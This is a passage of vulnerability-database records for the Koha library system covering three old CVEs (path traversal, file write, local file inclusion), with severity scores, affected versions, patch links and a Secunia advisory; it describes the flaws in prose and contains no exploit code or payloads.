    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2018-12-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-02-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "date": "2018-11-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "date": "2024-11-21T02:31:26.580000",
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha Path traversal vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      }
    ],
    "trust": 1.4
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      }
    ],
    "trust": 0.6
  }
}

var-202001-1308
Vulnerability from variot

Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors. Koha contains a path traversal vulnerability. Information may be altered. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability; 2. A directory-traversal vulnerability; 3. An arbitrary file-write vulnerability; 4. An SQL-injection vulnerability. An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1308",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.08.23"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.13"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.22"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.9"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.12"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.23"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.3"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.13"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Cormack, Galen Charlton, and John Lightsey",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-1923",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-1923",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2014-1923",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2014-1923",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-1923",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-1923",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202001-1091",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors. Koha contains a path traversal vulnerability. Information may be altered. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-1923",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/07/10",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/10/3",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "65448",
        "trust": 0.3
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "id": "VAR-202001-1308",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5804196
  },
  "last_update_date": "2024-11-23T22:16:39.983000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Security\u00a0release\u00a0-\u00a0February\u00a02014",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
      },
      {
        "title": "Koha Repair measures for path traversal vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112802"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
      },
      {
        "trust": 1.9,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
      },
      {
        "trust": 1.9,
        "url": "http://koha-community.org/security-release-february-2014/"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1923"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "date": "2020-01-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "date": "2020-01-24T17:15:12.250000",
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      },
      {
        "date": "2021-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      },
      {
        "date": "2024-11-21T02:05:16.930000",
        "db": "NVD",
        "id": "CVE-2014-1923"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha\u00a0 Vulnerabilities in path traversal",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008840"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1091"
      }
    ],
    "trust": 0.6
  }
}

var-201112-0305
Vulnerability from variot

Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm. LibLime Koha has a local file inclusion vulnerability. An attacker can exploit this vulnerability to gain sensitive information and execute arbitrary code in the context of a web server process, jeopardizing applications and computers. This may allow the attacker to compromise the application and computer; other attacks are also possible. Koha 3.4.x prior to 3.4.7 and 3.6.x prior to 3.6.1 are vulnerable.

----------------------------------------------------------------------



TITLE: Koha "KohaOpacLanguage" Local File Inclusion Vulnerability

SECUNIA ADVISORY ID: SA46980

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46980

RELEASE DATE: 2011-11-25

DISCUSS ADVISORY: http://secunia.com/advisories/46980/#comments


DESCRIPTION: Akin Tosunlar has discovered a vulnerability in Koha, which can be exploited by malicious people to disclose sensitive information.

Input passed to the "KohaOpacLanguage" cookie value in cgi-bin/koha/mainpage.pl is not properly verified in cgi-bin/opac/opac-main.pl before being used to include files.

The vulnerability is confirmed in version 4.02.06. Other versions may also be affected.

SOLUTION: Fixed in the GIT repository.

Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

PROVIDED AND/OR DISCOVERED BY: Akin Tosunlar, Vigasis Labs

ORIGINAL ADVISORY: Vigasis Labs: http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/






{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201112-0305",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.06"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.04"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.00"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.01"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.06.00.000"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.05"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.03"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "koha",
        "version": "3.04.02"
      },
      {
        "model": "liblime koha",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "4.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "koha",
        "version": "3.4.1"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "koha",
        "version": "3.4.2"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.6"
      },
      {
        "model": "liblime koha",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "koha",
        "version": "4.2 and earlier"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.4"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.6.1"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.4.7"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "4.2"
      },
      {
        "model": "liblime koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "4.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.6"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.4.6"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.6.1"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.4.7"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "liblime koha",
        "version": "*"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.06.00.000"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.00"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.01"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.02"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.03"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.04"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.05"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "koha",
        "version": "3.04.06"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-5088"
      },
      {
        "db": "BID",
        "id": "50812"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-130"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4715"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:koha:liblime_koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003333"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Akin Tosunlar(Vigasis Labs)",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-450"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2011-4715",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2011-4715",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.9 [IVD]"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2011-4715",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2011-4715",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201112-130",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
